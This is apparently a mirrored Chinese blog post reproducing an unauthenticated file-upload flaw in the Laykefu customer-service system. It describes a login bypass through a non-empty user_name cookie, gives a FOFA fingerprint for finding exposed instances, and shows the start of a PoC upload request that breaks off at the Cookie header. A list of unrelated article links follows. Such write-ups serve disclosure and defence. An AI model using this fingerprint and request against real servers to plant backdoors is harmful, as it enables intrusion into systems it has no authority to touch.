当前位置: 首页 > news >正文

Laykefu客服系统 任意文件上传漏洞复现

news 2025/7/16 8:54:55

0x01 产品简介

Laykefu 是一款基于workerman+gatawayworker+thinkphp5搭建的全功能webim客服系统,旨在帮助企业有效管理和提供优质的客户服务。

0x02 漏洞概述

Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞,而且当请求中Cookie中的”user_name“不为空时即可绕过登录系统后台,未经身份验证的攻击者可利用此问题,上传后门文件,获取服务器权限。

0x03 复现环境

FOFA:icon_hash="-334624619"

0x04 漏洞复现

PoC

POST /admin/users/upavatar.html HTTP/1.1
Host: your-ip
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie:
http://www.lryc.cn/news/286483.html

相关文章:

  • 《幻兽帕鲁》服务器该如何选购
  • 比较有创意的网站
  • alfred自定义谷歌翻译workflow
  • 【网络安全 -> 防御与保护】专栏文章索引
  • 用户资源(菜单)控制学习使用
  • 邦芒支招:十大秘诀助你轻松进名企
  • 5G_射频测试_参考规范(一)
  • 幻读是什么,用什么隔离级别可以防止幻读?
  • UE5 C++学习笔记 FString FName FText相互转换
  • 【ASOC全解析(三)】machine原理和实战
  • matlab appdesigner系列-常用15-滑块、微调器
  • google翻译相机报错 请安装最新的Google应用,以便使用相机翻译功能
  • openssl3.2/test/certs - 015 - Primary intermediate ca: ca-cert
  • linux中用户及用户组信息
  • 用Go plan9汇编实现斐波那契数列计算
  • Message queue 消息队列--RabbitMQ 【基础入门】
  • 【汇编】 13.3 对int iret和栈的深入理解
  • Git提交大文件报错“remote: Please remove the file from history and try again. ”
  • 接口测试 03 -- 接口自动化思维 Requests库应用
  • SpringBoot:Bean生命周期自定义初始化和销毁
  • Git--基本操作介绍(2)
  • 第08章_面向对象编程(高级)(static,单例设计模式,理解mian方法,代码块,final,抽象类与抽象方法,接口,内部类,枚举类,注解,包装类)
  • Java中Map接口常用的方法
  • Linux软件包管理器yum
  • Linux中NFS服务器的搭建和安装
  • c递归算法模型
  • 力扣740. 删除并获得点数
  • spring和springboot的区别
  • imgaug库图像增强指南(35):【iaa.Fog】——轻松创建自然雾气场景
  • 网络安全--防御保护02